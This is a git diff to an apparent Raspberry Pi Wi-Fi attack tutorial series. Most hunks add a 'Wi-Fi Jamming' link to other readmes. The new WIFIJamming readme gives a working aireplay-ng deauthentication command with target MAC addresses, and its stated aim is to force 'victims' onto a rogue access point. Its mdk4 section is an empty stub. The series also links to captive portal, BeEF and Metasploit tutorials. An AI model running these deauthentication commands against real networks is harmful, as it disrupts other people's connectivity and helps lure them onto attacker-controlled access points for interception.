diff --git a/AccessPoint/readme.md b/AccessPoint/readme.md index 1c6cd8d..5d0b84f 100644 --- a/AccessPoint/readme.md +++ b/AccessPoint/readme.md @@ -17,6 +17,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) ## Install needed and/or optional packages diff --git a/BeEF/readme.md b/BeEF/readme.md index 9f1cc26..edc6a13 100644 --- a/BeEF/readme.md +++ b/BeEF/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) - [STA Enumeration](../STAEnumeration) - [DNS Analysis](../DNSAnalysis) diff --git a/CaptivePortal/readme.md b/CaptivePortal/readme.md index 54cfc25..cd43a3e 100644 --- a/CaptivePortal/readme.md +++ b/CaptivePortal/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) ## Install needed and/or optional packages diff --git a/DNSAnalysis/readme.md b/DNSAnalysis/readme.md index eda9369..a9487d7 100644 --- a/DNSAnalysis/readme.md +++ b/DNSAnalysis/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) - [STA Enumeration](../STAEnumeration) diff --git a/DNSRedirection/readme.md b/DNSRedirection/readme.md index 534c975..e86324c 100644 --- a/DNSRedirection/readme.md +++ b/DNSRedirection/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) - [STA Enumeration](../STAEnumeration) - [DNS Analysis](../DNSAnalysis) diff --git a/HTTPAnalysis/readme.md b/HTTPAnalysis/readme.md index 50e8b20..335da32 100644 --- a/HTTPAnalysis/readme.md +++ b/HTTPAnalysis/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) - [STA Enumeration](../STAEnumeration) - [DNS Analysis](../DNSAnalysis) diff --git a/HTTPSAnalysis/readme.md b/HTTPSAnalysis/readme.md index b8cadfa..95cb6be 100644 --- a/HTTPSAnalysis/readme.md +++ b/HTTPSAnalysis/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) - [STA Enumeration](../STAEnumeration) - [DNS Analysis](../DNSAnalysis) diff --git a/Metasploit/readme.md b/Metasploit/readme.md index 464aabc..f805ebb 100644 --- a/Metasploit/readme.md +++ b/Metasploit/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) - [STA Enumeration](../STAEnumeration) - [DNS Analysis](../DNSAnalysis) diff --git a/STAEnumeration/readme.md b/STAEnumeration/readme.md index 8b2e7bb..ddd96fd 100644 --- a/STAEnumeration/readme.md +++ b/STAEnumeration/readme.md @@ -13,6 +13,7 @@ You should already have read (_and successful carried out_) the following tutori - [Setup Raspberry PI](../Setup) - [Prepare Raspberry PI](../Preparation) - [Wi-Fi Analysis](../WIFIAnalysis) +- [Wi-Fi Jamming](../WIFIJamming) - [Simple Access Point](../AccessPoint) ## Install needed and/or optional packages diff --git a/WIFIAnalysis/readme.md b/WIFIAnalysis/readme.md index ac5a055..a6f4bac 100644 --- a/WIFIAnalysis/readme.md +++ b/WIFIAnalysis/readme.md @@ -30,7 +30,9 @@ $ sudo apt install -y tcpdump wavemon aircrack-ng ## Attention -If you have already set up an [Access Point](../AccessPoint) and/or a [Captive portal](../CaptivePortal), you should stop them now! In this tutorial we need the `wlan1` interface in the so-called monitor mode. You cannot use the `wlan0 interface from the Raspberry PI for this. +> In this tutorial we need the `wlan1` interface in the so-called monitor mode. You cannot use the `wlan0` interface from the Raspberry PI for this. + +If you have already set up an [Access Point](../AccessPoint) and/or a [Captive portal](../CaptivePortal), you should stop them now! ```shell # stop nodogsplash service @@ -166,7 +168,7 @@ Press `F3` key to scan, `F2` to show the histogram, press `F10` key to exit. _Note: Read this [man page](http://manpages.ubuntu.com/manpages/bionic/man1/wavemon.1.html) to learn more about Wavemon._ -## Aircrack-ng +## airodump-ng (Aircrack-ng) The Aircrack-ng suite includes many tools to assess Wi-Fi networks. Here we focus on `airodump-ng` only. Please set your interface `wlan1` into monitor mode first (_but no need to specify the channel_)! diff --git a/WIFIJamming/readme.md b/WIFIJamming/readme.md new file mode 100644 index 0000000..14412dd --- /dev/null +++ b/WIFIJamming/readme.md @@ -0,0 +1,94 @@ +# WI-FI Jamming with Raspberry PI + +If you have read the previous tutorial [Wi-Fi Analysis](../WIFIAnalysis), you know your Wi-Fi environment around your location. Now you can immediately create an [Simple Access Point](../AccessPoint) and wait until the first victims come by themselves. You can also do this process a little faster -> The IEEE 802.11 (_Wi-Fi_) protocol contains the provision for a deauthentication frames. + +## Objective + +The aim of this tutorial is to speed-up the process that stations will connect to your access point. + +## Precondition + +You should already have read (_and successful carried out_) the following tutorials. + +- [Setup Raspberry PI](../Setup) +- [Prepare Raspberry PI](../Preparation) +- [Wi-Fi Analysis](../WIFIAnalysis) + +## Install needed and/or optional packages + +Install (_or ensure they are installed_) following packages. + +```shell +# update system (optional) +$ sudo apt update -y && sudo apt upgrade -y + +# install optional packages (optional) +$ sudo apt install -y vim wireless-tools + +# install needed packages +$ sudo apt install -y aircrack-ng mdk4 +``` + +## Attention + +> In this tutorial we need the `wlan1` interface in the so-called monitor mode. You cannot use the `wlan0` interface from the Raspberry PI for this. + +If you have already set up an [Access Point](../AccessPoint) and/or a [Captive portal](../CaptivePortal), you should stop them now! + +```shell +# stop nodogsplash service +$ sudo systemctl stop nodogsplash + +# stop hostapd service +$ sudo systemctl stop hostapd + +# stop dnsmasq service +$ sudo systemctl stop dnsmasq +``` + +## Monitor Mode + +The Wi-Fi interface (_wlan1_) must be set into "monitor mode". + +```shell +# set interface down +$ sudo ip link set wlan1 down + +# turn interface into monitor mode +$ sudo iwconfig wlan1 mode monitor + +# set interface up +$ sudo ip link set wlan1 up +``` + +## aireplay-ng (Aircrack-ng) + +The Aircrack-ng suite includes many tools to assess Wi-Fi networks. Here we focus on `aireplay-ng` only. + +```shell +# show help (optional) +$ aireplay-ng --help + +# start deauthentication attack +$ sudo aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan1 +``` + +- `-0` means deauthentication mode +- `0` means send continuously deauthentication frames (_otherwise you can set a specific number_) +- `-a [mac address]` means MAC address of the access point +- `-c [mac address] means MAC address of the station +- `wlan1` means the interface`(_in monitor mode_) + +## mdk4 + +... + +```shell +# +$ + +# +$ +``` + +[Go Back](../readme.md) diff --git a/readme.md b/readme.md index ad7b602..f3ad100 100644 --- a/readme.md +++ b/readme.md @@ -18,6 +18,7 @@ The author of this repository (_information, scripts, code_) take no responsibil ### **:satellite: Wi-Fi** - [Wi-Fi Analysis](./WIFIAnalysis) +- [Wi-Fi Jamming](./WIFIJamming) - [Simple Access Point](./AccessPoint) - [Simple Captive Portal](./CaptivePortal) - [STA Enumeration](./STAEnumeration)